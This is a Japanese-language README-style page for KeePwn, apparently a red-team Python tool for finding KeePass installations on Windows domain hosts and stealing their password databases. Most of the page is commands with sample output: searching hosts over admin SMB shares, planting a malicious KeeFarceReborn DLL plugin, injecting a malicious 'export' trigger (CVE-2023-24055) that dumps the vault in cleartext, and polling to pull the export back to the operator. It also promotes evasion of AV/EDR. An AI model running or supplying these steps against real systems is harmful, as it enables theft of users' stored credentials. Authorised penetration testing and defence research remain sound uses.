
KeePassの発見とシークレット抽出を自動化するpythonツール。

レッドチームがKeePassインスタンスを発見し、シークレットを抽出するためのPythonスクリプト。
git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help
あるいは、インストールせずにvirtualenvで実行したい場合:
git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
python3 KeePwn.py --help
KeePwnの search モジュールは、ターゲット環境でKeePassを実行しているホストを特定するために使用されます。
$ python3 KeePwn.py search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt
[*] Starting remote KeePass search with 5 threads
[PC01.COMPANY.LOCAL] No KeePass-related file found
[PC02.COMPANY.LOCAL] No KeePass-related file found
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC04.COMPANY.LOCAL] No KeePass-related file found
[PC05.COMPANY.LOCAL] No KeePass-related file found
Active Directory組み込みのC$共有を利用して、デフォルトの場所にあるKeePass関連ファイルを検索するため、ターゲットに対する管理者権限が必要です。
このモジュールはまず、各ユーザーの %APPDATA%\KeePass フォルダにある KeePass.config.xml 設定ファイルと、デフォルトのインストールパス(C:\Program Files\KeePass Password Safe 2)にある KeePass.exe を探します。設定ファイルが見つかったがKeePassがグローバルにインストールされていない場合、KeePwnは --max-depth サブフォルダまでのポータブルインストールを検索します。
この基本的な検索手法で、ワークステーションでKeePassが使用されているかどうかを正確に判断するのに十分です。さらに、 --get-process オプションを使用すると、ImpacketのRPC実装を利用して、ターゲット上でKeePassが現在実行中かどうかを確認できます。
検索結果をCSVファイルにエクスポートしたり、KeePassが見つかったターゲットのみを表示したり、並列スレッド数を調整したりするための、様々な生活の質を向上させるオプションも含まれています。
$ KeePwn search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv
[*] Starting remote KeePass search with 4 threads
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC03.COMPANY.LOCAL] Found running KeePass.exe process (User: COMPANY\jdoe, PID: 3820)
[+] Search results logged to keepwn_out.csv
KeePassにはプラグインフレームワークがあり、悪用することでKeePassプロセスに悪意のあるDLLをロードでき、管理者権限を持つ攻撃者が簡単にデータベースをエクスポートできるようになります(参照: KeeFarceRebornPlugin)。
KeePwnの plugin モジュールでは、以下のことが可能です:
現在インストールされているプラグインを一覧表示し、プラグインキャッシュを列挙
$ KeePwn plugin check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No path specified, searching in default locations..
[*] Found dbBackup.plgx in folder '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
[*] Found pDhkzWQYiobXhtBEEnbo in folder '\\C$\Users\jdoe\AppData\Local\KeePass\PluginCache'
悪意のあるプラグインの追加と削除
$ KeePwn plugin add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL --plugin KeeFarceRebornPlugin.dll
[*] No path specified, searching in default locations..
[*] Found KeePass Plugins directory '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
[!] About to add KeeFarceRebornPlugin.dll to KeePass Plugins directory, do you want to continue? [y/n]
> y
[+] Plugin successfully added to KeePass, wait for next restart, poll and enjoy!
%APPDATA% をポーリングしてエクスポートを確認し、リモートホストからローカルファイルシステムに自動的に移動
$ KeePwn plugin poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE
[+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
[+] Moved remote export to ./export.xml
これらの操作はSMB C$共有アクセスを介して行われ、コマンド実行が行われないため、AV/EDRの検出を制限します。
@harmj0yのブログ投稿(後にCVE-2023-24055)で説明されているように、KeePassのトリガーシステムを悪用して、データベースを平文でエクスポートすることができます。
KeePwnの trigger モジュールでは、以下のことが可能です:
KeePass設定に「export」という名前の悪意のあるトリガーが現在書き込まれているか確認
$ KeePwn trigger check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No KeePass configuration path specified, searching in default locations..
[*] Found global KeePass configuration '\\C$\Program Files\KeePass Password Safe 2\KeePass.config.xml'
[*] PreferUserConfiguration flag is set to true, meaning that local configuration is used
[*] Found local KeePass configuration '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[+] No trigger found in KeePass configuration
検出されたKeePassバージョンがこの手法の影響を受けない場合、KeePwnはプラグインの悪用を防ぐことに注意してください。
次回KeePass起動時に%APPDATA%にデータベースの平文エクスポートを実行する「export」という名前の悪意のあるトリガーを追加および削除
❯ python3 KeePwn.py trigger add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] No KeePass configuration path specified, searching in default locations..
[*] Found global KeePass configuration '\\C$\Program Files\KeePass Password Safe 2\KeePass.config.xml'
[*] PreferUserConfiguration flag is set to true, meaning that local configuration is used
[*] Found local KeePass configuration '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[+] Malicious trigger 'export' successfully added to KeePass configuration file (it may be deleted if KeePass is already running)
%APPDATA% をポーリングしてエクスポートを確認し、リモートホストからローカルファイルシステムに自動的に移動
$ KeePwn trigger poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
[*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE
[+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
[+] Moved remote export to ./export.xml
設定ファイルのパスがデフォルトの場所でない場合は、--config-path 引数で指定できます。
@vdohney によって説明されているように、メモリからデータベースのマスターパスワードを取得することが可能です(CVE-2023-32784、KeePass 2.54より前のバージョンに影響)。